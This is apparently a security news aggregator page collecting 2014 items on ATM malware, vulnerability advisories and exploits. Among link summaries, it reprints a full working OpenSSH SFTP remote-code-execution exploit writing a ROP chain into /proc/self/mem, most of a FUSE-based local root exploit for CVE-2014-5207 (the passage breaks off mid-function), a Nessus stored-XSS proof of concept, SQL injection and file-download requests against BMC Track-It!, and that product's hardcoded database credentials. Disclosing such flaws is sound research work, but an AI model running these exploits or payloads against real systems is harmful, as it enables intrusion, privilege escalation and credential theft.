Channel: BOT24

Tyupkin: Manipulating ATM Machines with Malware

Earlier this year, at the request of a financial institution, Kaspersky Lab's Global Research and Analysis Team performed a forensics investigation into a cyber-criminal attack targeting multiple ATMs in Eastern Europe.

During the course of this investigation, we discovered a piece of malware that allowed attackers to empty the ATM cash cassettes via direct manipulation.

At the time of the investigation, the malware was active on more than 50 ATMs at banking institutions in Eastern Europe.  Based on submissions to VirusTotal, we believe that the malware has spread to several other countries, including the U.S., India and China.

more here..........https://securelist.com/blog/research/66988/tyupkin-manipulating-atm-machines-with-malware/

Paper: Secure Key Storage and Secure Computation in Android

The increasing usage of smartphones also gains the interest of criminals, who shift their focus from attacking, for example, internet banking in a browser to attacking mobile banking using an application on a smartphone or a tablet. Of course, this is not limited to banking applications; other mobile services are also expected to see increased fraudulent activity in the coming years. Two important solutions to protect against attacks on mobile devices are secure key storage and secure computation. Secure key storage provides an environment where secret values needed for securing communication between parties are stored. Secure computation offers a secure environment within a device where trusted applications can run and handle sensitive operations such as asking for a PIN code.

direct download and more here........... http://www.ru.nl/publish/pages/578936/scriptie_tim_cooijmans.pdf

My Adventure With Fireeye FLARE Challenge

These are my (rather long) solutions to Fireeye’s FLARE challenge. This is not just the solution but also the other ways that I tried. This was a great learning experience for me, so I am writing this post to document everything I tried. As a result, this post is somewhat long.

more here.........http://parsiya.net/blog/2014-10-07-my-adventure-with-fireeye-flare-challenge/

Reverse Engineering Star Wars: Yoda Stories

I don't know why, but I've always gotten a kick out of reverse engineering data files for computer games. Although decompiling a game's code is a challenging task, data files are often much easier to figure out (as they contain lots of highly visible content like text and sprites) and let you mod the game if you're able to figure it out sufficiently.

more here.........http://www.zachtronics.com/yoda-stories/

Veil-Ordnance – Fast Stager Shellcode Generation

Generating shellcode is a task that nearly all pen testers have to do at some point, unless they write their own shellcode.  The typical way of generating shellcode consists of using msfvenom, or the combination of msfpayload and msfencode.  Both of these methods can easily generate shellcode for the payload of your choice, and you can invoke shellcode encoders, if necessary, to avoid bad characters.

Since its release, Veil-Evasion has always relied on msfvenom for generating the shellcode within Veil-Evasion payloads.  Leveraging another tool’s capabilities has allowed us to rely on the Metasploit Framework to handle the shellcode generation without requiring too much effort on our end.  However, this has also caused some issues.

more here..........https://www.veil-framework.com/veil-ordnance-fast-shellcode-generation/

Cuckoo Sandbox 1.1.1

This is an immediate release of Cuckoo Sandbox 1.1.1, a hotfix for a security vulnerability discovered by Robert Michel from G-Data. The vulnerability is an arbitrary file upload from the guest virtual machines to the host system, which could potentially translate into command or code execution. It affects all versions of Cuckoo Sandbox from 0.6.

more here..........http://cuckoosandbox.org/2014-10-07-cuckoo-sandbox-111.html

Massive Moniker.com Breach, Valuable Domains Stolen

Yesterday Acro.net and his other site DomainGang.com posted two important articles related to a breach at Moniker.com. I wanted to write yesterday but I was pretty busy with other stuff, plus behind the scenes I was working with an affected domain owner on the phone and digging up information on the potential domain thefts. This is very important, so you need to be aware!! If you have a Moniker.com account, you really need to pay attention and take some actions!

more here........http://dotweekly.com/massive-moniker-com-breach-valuable-domains-stolen/

Nessus Web UI 2.3.3: Stored XSS

Nessus Web UI 2.3.3: Stored XSS
=========================================================

CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08

-- Info --

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.

-- Affected version --

Web UI version 2.3.3, Build #83

-- Vulnerability details --

By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute JavaScript code on the machine of the person performing a vulnerability scan of the web server. No escaping of JavaScript code is performed when the server header is passed to the affected Web UI version via a plugin.
The JavaScript code is stored in the backend database and executes every time the target views a report that returns the server header.

-- POC --

#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log

class Site(server.Site):
    # Every response carries the crafted Server header that the affected
    # Web UI stores and renders without escaping.
    def getResourceFor(self, request):
        request.setHeader(b'server', b'<script>alert(1)</script>SomeServer')
        return server.Site.getResourceFor(self, request)

class HelloResource(resource.Resource):
    isLeaf = True
    numberRequests = 0

    def render_GET(self, request):
        self.numberRequests += 1
        request.setHeader(b"content-type", b"text/plain")
        # The body itself is harmless; the header is the payload.
        return b"theSecurityFactory Nessus POC"

log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()

-- Solution --

This issue has been fixed as of version 2.3.4 of the WEB UI.


-- Timeline --

2014-06-12    Release of Web UI version 2.3.3, build#83
2014-06-13    Vulnerability discovered and creation of POC
2014-06-13    Vulnerability responsibly reported to vendor
2014-06-13    Vulnerability acknowledged by vendor
2014-06-13    Release of Web UI version 2.3.4, build#85
2014-XX-XX    Advisory published in coordination with vendor

-- Credit --

Frank Lycops
Frank.lycops [at] thesecurityfactory.be

CVE-2014-4502 (Updated) : Invalid Handling of Length Parameter in Stratum mining.notify Message Leads to Heap Overflow

Vulnerability title: Invalid Handling of Length Parameter in Stratum
mining.notify Message Leads to Heap Overflow
CVE: CVE-2014-4502
Affected version: SGMiner before 4.2.2, CGMiner before 4.3.5, BFGMiner
before 4.1.0, CPUMiner before 2.4.1
Reported by: Mick Ayzenberg of Deja vu Security

Details:

A pool responds to a "mining.subscribe" Stratum request with a list of
parameters the application will use when mining.  Two of these
parameters are "Extranonce1", a hex-encoded string, and
"Extranonce2_size", the length of a nonce the miner can increment.

A malicious pool or an attacker who is in the middle of a valid Stratum
connection can respond to a "mining.subscribe" request from a client
with arbitrary Extranonce1 and Extranonce2_size parameters.

An attacker can then send a valid "mining.notify" request to initiate
mining. The "mining.notify" message specifies parameters "coinb1" and
"coinb2", hex encoded strings of arbitrary length.

Cgminer, Sgminer, Bfgminer, and CPUMiner will use the values provided to
calculate memory requirements for a valid block and copy parameters
into this allocated space.  By setting the value of "Extranonce2_size"
to be negative or large, an attacker can force the "parse_notify"
function to allocate less memory than expected and overwrite memory in
the heap.

CVE-2014-6251 : Stack Overflow in CPUMiner When Submitting Upstream Work

Vulnerability title: Stack Overflow in CPUMiner When Submitting Upstream
Work
CVE: CVE-2014-6251
Affected version: CPUMiner before 2.4.1
Reported by: Mick Ayzenberg of Deja vu Security

Details:

A malicious pool or an attacker who is in the middle of a valid
stratum connection can respond to a 'mining.subscribe' and instruct a
miner to use a large nonce2 length.

The attacker can then instruct the miner to generate blocks with a
standard 'mining.notify' request. Once the miner has discovered a
valid block it will attempt to copy this large nonce into a fixed size
character array and overflow into stack memory.
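As an added illustration for the two Stratum advisories above (this is not code from cgminer, sgminer, bfgminer or cpuminer; the function names and size limits are assumptions), a bounds-checked coinbase assembly that rejects the pool-supplied Extranonce2_size and hex lengths before any allocation or copy takes place, together with the bounded nonce2 encoding for mining.submit that CVE-2014-6251 concerns:

```c
/* Added example, not code from cgminer/sgminer/bfgminer/cpuminer: a
 * bounds-checked coinbase assembly for the Stratum parameters the two
 * advisories describe. Names and limits are hypothetical. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define XN1_BYTES_MAX  64           /* extranonce1: a few bytes in practice */
#define XN2_SIZE_MAX   8            /* extranonce2 counter: pools use 4..8 */
#define COINBASE_MAX   (64 * 1024)  /* cap on decoded coinb1 or coinb2 */

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode hex into out[0..cap). Returns bytes written, or -1 on odd length,
 * a non-hex digit, or a result that would not fit. */
long hex_decode(const char *hex, uint8_t *out, size_t cap) {
    size_t n = strlen(hex);
    if (n % 2 != 0 || n / 2 > cap) return -1;
    for (size_t i = 0; i < n; i += 2) {
        int hi = hexval(hex[i]), lo = hexval(hex[i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[i / 2] = (uint8_t)((hi << 4) | lo);
    }
    return (long)(n / 2);
}

/* Values as received from mining.subscribe / mining.notify. xn2_size stays
 * signed on purpose: the JSON integer from the pool may be negative. */
struct stratum_params {
    long        xn2_size;
    const char *xn1_hex;
    const char *coinb1_hex;
    const char *coinb2_hex;
};

/* Build coinb1 || extranonce1 || extranonce2 || coinb2. Returns the length
 * and sets *out (caller frees), or returns -1 with *out == NULL. In the
 * vulnerable miners a negative or huge Extranonce2_size went straight into
 * the size arithmetic, so the allocation came out smaller than the copies
 * that followed; here every length is validated before any arithmetic. */
long build_coinbase(const struct stratum_params *p, uint8_t **out) {
    *out = NULL;
    if (p->xn2_size < 1 || p->xn2_size > XN2_SIZE_MAX) return -1;
    size_t xn2 = (size_t)p->xn2_size;

    /* Hex lengths must be even, and each decoded part is capped so the
     * total cannot wrap size_t. */
    size_t l1 = strlen(p->coinb1_hex), lx = strlen(p->xn1_hex),
           l2 = strlen(p->coinb2_hex);
    if ((l1 | lx | l2) & 1) return -1;
    size_t cb1 = l1 / 2, xn1 = lx / 2, cb2 = l2 / 2;
    if (xn1 > XN1_BYTES_MAX || cb1 > COINBASE_MAX || cb2 > COINBASE_MAX) return -1;

    size_t total = cb1 + xn1 + xn2 + cb2;
    uint8_t *buf = calloc(1, total);
    if (!buf) return -1;

    size_t off = 0;
    if (hex_decode(p->coinb1_hex, buf + off, total - off) != (long)cb1) goto fail;
    off += cb1;
    if (hex_decode(p->xn1_hex, buf + off, total - off) != (long)xn1) goto fail;
    off += xn1 + xn2;               /* extranonce2 counter: zeroed by calloc */
    if (hex_decode(p->coinb2_hex, buf + off, total - off) != (long)cb2) goto fail;
    *out = buf;
    return (long)total;
fail:
    free(buf);
    return -1;
}

/* Hex-encode the extranonce2 counter for mining.submit into a fixed-size
 * buffer: the copy that overflowed the stack in CVE-2014-6251 when the
 * length came straight from the pool. The destination capacity is checked
 * here independently of the validation above. */
bool format_nonce2(const uint8_t *nonce2, size_t xn2_size, char *dst, size_t cap) {
    if (xn2_size > XN2_SIZE_MAX || cap < 2 * xn2_size + 1) return false;
    for (size_t i = 0; i < xn2_size; i++)
        snprintf(dst + 2 * i, 3, "%02x", nonce2[i]);
    return true;
}

int main(void) {
    /* Constructed sample: a pool answering with a negative Extranonce2_size. */
    struct stratum_params bad  = { -4, "08000002", "01000000", "ffffffff" };
    struct stratum_params good = {  4, "08000002", "01000000", "ffffffff" };
    uint8_t *cb = NULL;
    printf("negative xn2_size -> %ld\n", build_coinbase(&bad, &cb));
    printf("valid parameters  -> %ld bytes\n", build_coinbase(&good, &cb));
    free(cb);
    return 0;
}
```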

Huge Data Leak at Largest U.S. Bond Insurer

On Monday, KrebsOnSecurity notified the Municipal Bond Insurance Association — the nation’s largest bond insurer — that a misconfiguration in a company Web server had exposed countless customer account numbers, balances and other sensitive data. Much of the information had been indexed by search engines, including a page listing administrative credentials that attackers could use to access data that wasn’t already accessible via a simple Web search.

more here...........http://krebsonsecurity.com/2014/10/huge-data-leak-at-largest-u-s-bond-insurer/

How to steal access to over 500,000 bank accounts: The insider view of a Russian cybercrime infrastructure

Proofpoint security researchers have published an analysis that exposes the inner workings of a cybercrime operation targeting online banking credentials for banks in the United States and Europe. This Proofpoint research report provides a detailed and rarely seen inside view of the infrastructure, tools and techniques that enabled this cybercrime group to infect over 500,000 PCs.

more here...........http://www.proofpoint.com/threatinsight/posts/the-insider-view-of-a-russian-cybercrime-infrastructure.php

NCR ATM API Documentation Available on Baidu

A recent ATM breach in Malaysia has caused havoc for several local banks. According to reports, approximately 3 million Malaysian Ringgit (almost 1 million USD) was stolen from 18 ATMs. There is no detailed information on how the attack was performed by the criminals, but according to one local news report, police claimed the criminals installed malware with the file name "ulssm.exe" which was found on the compromised ATMs. Based on the file name, we know that the malware in question was first discovered by Symantec and it is known as "PadPin".

more here...........http://www.f-secure.com/weblog/archives/00002751.html

Escaping DynamoRIO and Pin - or why it's a worse-than-you-think idea to run untrusted code or to input untrusted data

Before we begin, I want to clarify that both DynamoRIO and Pin are great tools that I use all the time. Dynamic Binary Modification is a very powerful technique in general. However, both implementations have a limitation which can have serious security implications for some use cases and which, as far as I can tell, is not documented in the user manuals. I got in touch with people involved in both projects and they've explained that they consider it low risk for the typical usage scenario and that fixing it would add performance overhead. This is a perfectly reasonable position, but I think this sort of low risk / high impact issue should be very well and visibly documented.

more here..........https://github.com/lgeek/dynamorio_pin_escape

OpenSSH

OpenSSH lets you grant SFTP access to users without allowing full command
execution using "ForceCommand internal-sftp". However, if you misconfigure
the server and don't use ChrootDirectory, the user will be able to access
all parts of the filesystem that he has access to - including procfs. On
modern Linux kernels (>=2.6.39, I think), /proc/self/maps reveals the
memory layout and /proc/self/mem lets you write to arbitrary memory
positions. Combine those and you get easy RCE.

The Linux version of OpenSSH 6.7 contains a mitigation, see the release notes:

 * sftp-server(8): On platforms that support it, use prctl() to
   prevent sftp-server from accessing /proc/self/{mem,maps}
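As an added example (not part of Jann Horn's post), the two sshd_config shapes the post contrasts: ForceCommand internal-sftp without a chroot, and the chrooted form that keeps procfs and the rest of the filesystem out of the SFTP user's reach. The group name and directory are assumptions.

```sshd_config
# Weak (the misconfiguration described above): SFTP-only users cannot run
# commands, but the session still sees the whole filesystem, /proc included.
Match Group sftponly
    ForceCommand internal-sftp
    AllowTcpForwarding no
    X11Forwarding no

# Corrected: confine the session to a per-user directory. sshd insists that
# ChrootDirectory and every path component above it are owned by root and
# not writable by any other user or group. A chroot contains no /proc unless
# the administrator mounts one there, so /proc/self/{mem,maps} is unreachable
# regardless of the sftp-server prctl() mitigation in 6.7.
Match Group sftponly
    ChrootDirectory /srv/sftp/%u
    ForceCommand internal-sftp
    AllowTcpForwarding no
    X11Forwarding no
```

`sshd -T -C user=<name>` prints the effective configuration for a given user, which is the quickest way to confirm that a ChrootDirectory actually applies to the SFTP-only accounts.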

Here's my PoC for 64bit Linux:

#define _GNU_SOURCE

// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
// (In other words, please don't use this against other people's machines.)

#include <libssh/libssh.h>
#include <libssh/sftp.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>   // getpass()

#define min(a,b) (((a)<(b))?(a):(b))

sftp_session sftp;

size_t grab_file(char *rpath, char **out) {
  size_t allocated = 4000, used = 0;
  *out = calloc(1, allocated+1);
  sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
  if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
  while (1) {
    ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
    if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
    if (nbytes == 0) {
      (*out)[used] = '\0';
      sftp_close(f);
      return used;
    }
    used += nbytes;
    if (used == allocated) {
      allocated *= 4;
      *out = realloc(*out, allocated);
    }
  }
}

void dump_file(char *name, void *buf, size_t len) {
  FILE *f = fopen(name, "w+");
  if (!f) perror("can't write to local file"), exit(1);
  if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
  if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
}

size_t slurp_file(char *path, char **out) {
  size_t allocated = 4000, used = 0;
  *out = calloc(1, allocated+1);
  FILE *f = fopen(path, "r");
  if (f == NULL) perror("opening local file failed"), exit(1);
  while (1) {
    ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
    if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
    if (nbytes == 0) {
      (*out)[used] = '\0';
      if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
      return used;
    }
    used += nbytes;
    if (used == allocated) {
      allocated *= 4;
      *out = realloc(*out, allocated);
    }
  }
}

int main(int argc, char **argv) {
  if (argc != 4) fprintf(stderr, "invocation: ./exploit host user 'shell commands here'\n"), exit(1);
  char *target_host = argv[1];
  char *target_user = argv[2];
  char *shell_commands = argv[3];

  ssh_session my_ssh_session;
  int rc;
  char *password;
  // Open session and set options
  my_ssh_session = ssh_new();
  if (my_ssh_session == NULL) exit(-1);
  ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
  ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
  // Connect to server
  rc = ssh_connect(my_ssh_session);
  if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);

  // Authenticate ourselves
  password = getpass("Password: ");
  rc = ssh_userauth_password(my_ssh_session, NULL, password);
  if (rc != SSH_AUTH_SUCCESS)
    fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);

  sftp = sftp_new(my_ssh_session);
  if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);

  rc = sftp_init(sftp);
  if (rc != SSH_OK) {
    fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
    sftp_free(sftp);
    return rc;
  }

  char *mappings;
  grab_file("/proc/self/maps", &mappings);
  //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);

  printf("got /proc/self/maps. looking for libc...\n");
  // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466                    /lib/x86_64-linux-gnu/libc-2.13.so
  long long start_addr, end_addr, offset;
  char *libc_path = NULL;
  long long stack_start_addr = 0, stack_end_addr;
  for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
    if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
      if (libc_path) fprintf(stderr, "warning: two times libc?\n");
      printf("mapping line: %s\n", p);
      if (sscanf(p, "%Lx-%Lx %*4c %Lx", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
      libc_path = strdup(strchr(p, '/'));
      if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
    }
    if (strstr(p, "[stack]")) {
      if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
      printf("mapping line: %s\n", p);
      if (sscanf(p, "%Lx-%Lx ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
    }
  }
  if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
  if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
  printf("remote libc is at %s\n", libc_path);
  printf("offset %Lx from libc is mapped to %Lx-%Lx\n", offset, start_addr, end_addr);

  char *libc;
  size_t libc_size = grab_file(libc_path, &libc);
  dump_file("libc.so", libc, libc_size);
  printf("downloaded libc, size is %zu bytes\n", libc_size);

  system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
  char *system_offset_str;
  slurp_file("system.addr", &system_offset_str);
  long long system_offset;
  if (sscanf(system_offset_str, "%Lx", &system_offset) != 1) perror("scanf failed"), exit(1);
  long long remote_system_addr = start_addr+system_offset-offset;
  printf("remote system() function is at %Lx\n", remote_system_addr);

  printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
  char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
  if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
  long long gadget_address = start_addr + (gadget-(libc+offset));
  long long ret_address = gadget_address+1;
  printf("found gadget at %Lx\n", gadget_address);

  printf("remote stack is at %Lx-%Lx\n", stack_start_addr, stack_end_addr);
  printf("doing it the quick-and-dirty way (that means: pray that the target"
         "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
  long long stack_len = stack_end_addr - stack_start_addr;
  /*if (stack_len > 32000) {
    stack_len = 32000;
    stack_start_addr = stack_end_addr - stack_len;
  }*/
  char *new_stack = malloc(stack_len);

  // first fill it with our ret slide
  for (long long *s = (void*)new_stack; s<(long long*)(new_stack+stack_len); s++) {
    *s = ret_address;
  }

  // put some shell commands in the head
  strcpy(new_stack, shell_commands);

  // put the mini-ROP-chain at the end
  // [address of pop rdi] [stack head] [address of system]
  long long *se = (void*)(new_stack + stack_len);
  se[-3] = gadget_address;
  se[-2] = stack_start_addr;
  se[-1] = remote_system_addr;

  printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
  sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
  if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);

  // first send over the string
  rc = sftp_seek64(mem, stack_start_addr);
  if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
  ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
  if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");

  // now send over the rest right-to-left
  for (long long off = stack_len-32000; off >= 0; off -= 32000) {
    rc = sftp_seek64(mem, stack_start_addr+off);
    if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
    mem_written = sftp_write(mem, new_stack+off, 32000);
    if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
  }

  return 0;
}


Authored by Jann Horn



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

[CERT VU#121036 / Multiple CVEs] RCE, domain admin creds leakage and more in BMC Track-It!

Hi,

tl;dr - I am releasing two 0 day exploits for BMC Track-It!. One is a
RCE and the other gets you the domain admin and SQL database creds.
Other minor vulns are also disclosed. Details below.

CERT handled the disclosure for these vulnerabilities (see CERT
VU#121036) and according to them BMC didn't even acknowledge the issue
for 45 days.

BMC have contacted me directly today, but it's too late now, the cat
is out of the bag as the CERT advisory has been published. Any
vulnerability researcher worth their salt will be able to work out how
to exploit these issues, so there is no point in holding back on
releasing the exploits.

The exploits have been submitted to Metasploit and should be released soon, see:
https://github.com/rapid7/metasploit-framework/pull/3965
https://github.com/rapid7/metasploit-framework/pull/3966

>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================

The application exposes several .NET remoting services on port 9010.
.NET remoting is a RMI technology similar to Java RMI or CORBA which
allows you to invoke methods remotely and retrieve their result. In
BMC Track-It!, the .NET remoting services are unauthenticated and
unencrypted, meaning that anyone can invoke all the exposed methods
remotely.

It is possible to capture traffic and decode the packet format by
looking at the (incomplete) Microsoft .NET remoting specifications.
Using these techniques, two Metasploit modules were produced: one is an
exploit module that can upload arbitrary files to the web root and
achieve remote code execution, and the other is an auxiliary module
that allows retrieval of the SQL and domain administrator credentials.

Three other vulnerabilities (SQL injection, arbitrary file download
and hardcoded database credentials) were also discovered.

A special thanks to CERT for handling the communication to BMC and the
disclosure of these vulnerabilities. These issues are tracked by CERT
as VU#121036 (http://www.kb.cert.org/vuls/id/121036).


>> Background on the affected product:
"Track-It! IT Help Desk Software includes everything you need for IT
Help Desk management. Full featured, easy to deploy, easy to use and
cost-effective, Track-It! Help Desk is designed specifically with the
needs of small to mid-sized organizations in mind.
Over 55,000 organizations worldwide have trusted Track-It! for their
IT help desk ticketing and asset management needs. Track-It! IT Help
Desk Software includes, helpdesk, work order ticket tracking, incident
and problem management, knowledge management, service level
management, asset management, change management, software license
management, mobile device access, end-user self-service and more.
Track-It! Help Desk delivers the strength of ITSM best practices with
the simplicity of smooth installation and quick configuration to
provide instant return on your investment."


>> Technical details:
#1 Domain administrator and SQL server user credentials disclosure
(unauthenticated)
Versions affected: 9 to 11.3+ (version 8 might be affected, but could
not be confirmed)
CVE-2014-4872

The application exposes an unauthenticated .NET remoting configuration
service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a
configuration file that contains the application database name,
username and password as well as the domain administrator username and
password. These are encrypted using a fixed key and IV ("NumaraIT")
using the DES algorithm. The domain administrator username and
password can only be obtained if the Self-Service component is
enabled, which is the most common scenario in enterprise deployments.
A Metasploit module that exploits this vulnerability has been released.


#2 Remote code execution via file upload (unauthenticated)
Versions affected: 8 to 11.3+
CVE-2014-4872 (same as #1)

The application exposes an unauthenticated .NET remoting file storage
service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an
arbitrary path on the machine that is running Track-It!. This can be
used to upload a file to the web root and achieve code execution as
NETWORK SERVICE or SYSTEM.
A Metasploit module that exploits this vulnerability has been released.


#3 Blind SQL injection (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4873

POST /TrackItWeb/Grid/GetData
pagingMode=0&id=WebGrid.21&appFilters=[{"type":"numeric","field":"userid
 = 51)) blag; $CREATE TABLE lol(lulz text);$ select woid from (select
woid, row_number() over (ORDER BY woid) RowNumber from z$vTASKS_BROWSE
-- ","comparison":"=","value":51}]

Accepts injection between the two $.


#4 Arbitrary file download (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4874

GET /TrackItWeb/Attachment/Open?attachmentType=1&entityId=1337&entityGuid=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa&fileName=C:\boot.ini


#5 Hardcoded database credentials
Versions affected: Unknown, at least from 8 to 11.3+

When installed with the built-in SQL Express, Track-It! uses the
following hardcoded database credentials:
Username: TrackIt80_1
Password: TI_DB_P@ssw0rd


>> Fix:
UNFIXED - the vendor refused to acknowledge the vulnerabilities and
did not respond to CERT.
Block all communications from untrusted networks (e.g. the Internet)
to ports 9010 to 9020.
Block the database port if you are using the built-in SQL Express
(port 49159 is the default in recent versions).
Ensure you do not have any untrusted users with access to Track-It!.


A copy of this advisory can be found in my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt

Regards,
Pedro Ribeiro




Exploit for CVE-2014-5207

I've been sitting on this for too long.  CVE-2014-5207 was an
interesting bug found by Kenton Varda and Eric Biederman.  Here's a
somewhat ugly PoC root exploit.  You'll need the ability to use FUSE,
although variants would work with removable media or network file
systems, too.

--Andy Lutomirski

/*
  FUSE-based exploit for CVE-2014-5207
  Copyright (c) 2014 Andy Lutomirski

  Based on code that is:
  Copyright (C) 2001-2007  Miklos Szeredi <miklos@szeredi.hu>

  This program can be distributed under the terms of the GNU GPL.
  See the file COPYING.

  gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid
  mkdir test
  ./fuse_suid test

  This isn't a work of art: it doesn't clean up after itself very well.
*/

#define _GNU_SOURCE
#define FUSE_USE_VERSION 26

#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <err.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <unistd.h>

static const char *sh_path = "/sh";
static int sh_fd;
static loff_t sh_size;

static int hello_getattr(const char *path, struct stat *stbuf)
{
    int res = 0;

    memset(stbuf, 0, sizeof(struct stat));
    if (strcmp(path, "/") == 0) {
        stbuf->st_mode = S_IFDIR | 0755;
        stbuf->st_nlink = 2;
    } else if (strcmp(path, sh_path) == 0) {
        stbuf->st_mode = S_IFREG | 04755;
        stbuf->st_nlink = 1;
        stbuf->st_size = sh_size;
    } else
        res = -ENOENT;

    return res;
}

static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
             off_t offset, struct fuse_file_info *fi)
{
    (void) offset;
    (void) fi;

    if (strcmp(path, "/") != 0)
        return -ENOENT;

    filler(buf, ".", NULL, 0);
    filler(buf, "..", NULL, 0);
    filler(buf, sh_path + 1, NULL, 0);

    return 0;
}

static int hello_open(const char *path, struct fuse_file_info *fi)
{
    if (strcmp(path, sh_path) != 0)
        return -ENOENT;

    if ((fi->flags & 3) != O_RDONLY)
        return -EACCES;

    return 0;
}

static int hello_read(const char *path, char *buf, size_t size, off_t offset,
              struct fuse_file_info *fi)
{
    (void) fi;
    if (strcmp(path, sh_path) != 0)
        return -ENOENT;

    return pread(sh_fd, buf, size, offset);
}

static struct fuse_operations hello_oper = {
    .getattr    = hello_getattr,
    .readdir    = hello_readdir,
    .open        = hello_open,
    .read        = hello_read,
};

static int evilfd = -1;

static int child2(void *mnt_void)
{
    const char *mountpoint = mnt_void;
    int fd2;

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
        err(1, "unshare");

    if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)
        err(1, "mount");

    fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);
    if (fd2 == -1)
        err(1, "open");

    if (dup3(fd2, evilfd, O_CLOEXEC) == -1)
        err(1, "dup3");
    close(fd2);

    printf("Mount hackery seems to have worked.\n");

    exit(0);
}

static int child1(const char *mountpoint)
{
    char child2stack[2048];
    char evil_path[1024];

    evilfd = dup(0);
    if (evilfd == -1)
        err(1, "dup");

    /* clone() takes the top of the child's stack; stacks grow downward on
       x86, so pass the end of the array rather than its base. */
    if (clone(child2, child2stack + sizeof(child2stack),
          CLONE_FILES | CLONE_VFORK,
          (void *)mountpoint) == -1)
        err(1, "clone");

    printf("Here goes...\n");

    sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);
    execl(evil_path, "sh", "-p", NULL);
    perror(evil_path);
    return 1;
}

static int fuse_main_suid(int argc, char *argv[],
              const struct fuse_operations *op,
              void *user_data)
{
    struct fuse *fuse;
    char *mountpoint;
    int multithreaded;
    int res;

    if (argc != 2) {
        printf("Usage: fuse_suid <mountpoint>\n");
        return -EINVAL;
    }

    char *args[] = {"fuse_suid", "-f", "--", argv[1], NULL};

